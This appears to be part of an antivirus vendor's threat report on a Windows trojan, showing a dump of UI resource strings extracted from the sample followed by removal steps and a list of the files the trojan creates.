.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_F(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_L(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH,SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON%SILVER_IDB_OFFICE2007_RIBBON_BTN_MAIN)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_L'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_R*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T 
SILVER_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN,SILVER_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE'SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA-SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS*SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_BACK)SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB-SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB.SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB(SILVER_IDB_OFFICE2007_RIBBON_KEYTIP_BACK)SILVER_IDB_OFFICE2007_
RIBBON_PANEL_BACK_B)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_T'SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN.SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER&SILVER_IDB_OFFICE2007_RIBBON_PANEL_QAT,SILVER_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR*SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_BACK.SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY,SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL0SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT-SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS,SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS)SILVER_IDB_OFFICE2007_RIBBON_SLIDER_THUMB$SILVER_IDB_OFFICE2007_STATUSBAR_BACK(SILVER_IDB_OFFICE2007_STATUSBAR_BACK_EXT*SILVER_IDB_OFFICE2007_STATUSBAR_PANEBORDER'SILVER_IDB_OFFICE2007_STATUSBAR_SIZEBOX"SILVER_IDB_OFFICE2007_SYS_BTN_BACK$SILVER_IDB_OFFICE2007_SYS_BTN_BACK_S#SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE%SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S%SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE'SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE_S
WINDOWS7_IDB_COMBOBOX_BTN
WINDOWS7_IDB_MENU_BTN
WINDOWS7_IDB_MENU_BTN_DISABLED
WINDOWS7_IDB_MENU_ITEM_BACK
WINDOWS7_IDB_MENU_ITEM_MARKER_C
WINDOWS7_IDB_MENU_ITEM_MARKER_R WINDOWS7_IDB_RIBBON_BORDER_PANEL
WINDOWS7_IDB_RIBBON_BORDER_QAT
WINDOWS7_IDB_RIBBON_BTN_DEFAULT$WINDOWS7_IDB_RIBBON_BTN_DEFAULT_ICON%WINDOWS7_IDB_RIBBON_BTN_DEFAULT_IMAGE#WINDOWS7_IDB_RIBBON_BTN_DEFAULT_QAT%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_F
WINDOWS7_IDB_RIBBON_BTN_GROUP_L
WINDOWS7_IDB_RIBBON_BTN_GROUP_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_S
WINDOWS7_IDB_RIBBON_BTN_LAUNCH#WINDOWS7_IDB_RIBBON_BTN_LAUNCH_ICON
WINDOWS7_IDB_RIBBON_BTN_MAIN WINDOWS7_IDB_RIBBON_BTN_MENU_H_C WINDOWS7_IDB_RIBBON_BTN_MENU_H_M WINDOWS7_IDB_RIBBON_BTN_MENU_V_C WINDOWS7_IDB_RIBBON_BTN_MENU_V_M WINDOWS7_IDB_RIBBON_BTN_NORMAL_B WINDOWS7_IDB_RIBBON_BTN_NORMAL_S
WINDOWS7_IDB_RIBBON_BTN_PAGE_L
WINDOWS7_IDB_RIBBON_BTN_PAGE_R!WINDOWS7_IDB_RIBBON_BTN_PALETTE_B!WINDOWS7_IDB_RIBBON_BTN_PALETTE_M!WINDOWS7_IDB_RIBBON_BTN_PALETTE_T#WINDOWS7_IDB_RIBBON_BTN_STATUS_PANE
WINDOWS7_IDB_RIBBON_CAPTION_QA!WINDOWS7_IDB_RIBBON_CATEGORY_BACK WINDOWS7_IDB_RIBBON_CATEGORY_TAB$WINDOWS7_IDB_RIBBON_CATEGORY_TAB_SEP WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_TAB%WINDOWS7_IDB_RIBBON_CONTEXT_SEPARATOR WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_TAB
WINDOWS7_IDB_RIBBON_PANEL_BACK"WINDOWS7_IDB_RIBBON_PANEL_BACK_SEP
WINDOWS7_IDB_RIBBON_PANEL_MAIN$WINDOWS7_IDB_RIBBON_SLIDER_BTN_MINUS#WINDOWS7_IDB_RIBBON_SLIDER_BTN_PLUS
WINDOWS7_IDX_STYLE


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    txservices.exe:760

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\txservices.exe (1638 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\26727603220161118442467[1].htm (92423 bytes)
    C:\exdui.dll (53 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PRU52LTK.txt (90 bytes)
    %Program Files%\23.txt (111347 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll (17850 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\33[1].txt (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt (102386 bytes)
    %Program Files%\sesvcs_963_56089.exe (1815 bytes)
    %Program Files%\NamuADLook.dll (21746 bytes)
    C:\help.dll (202 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G1K1JV5K.txt (112 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
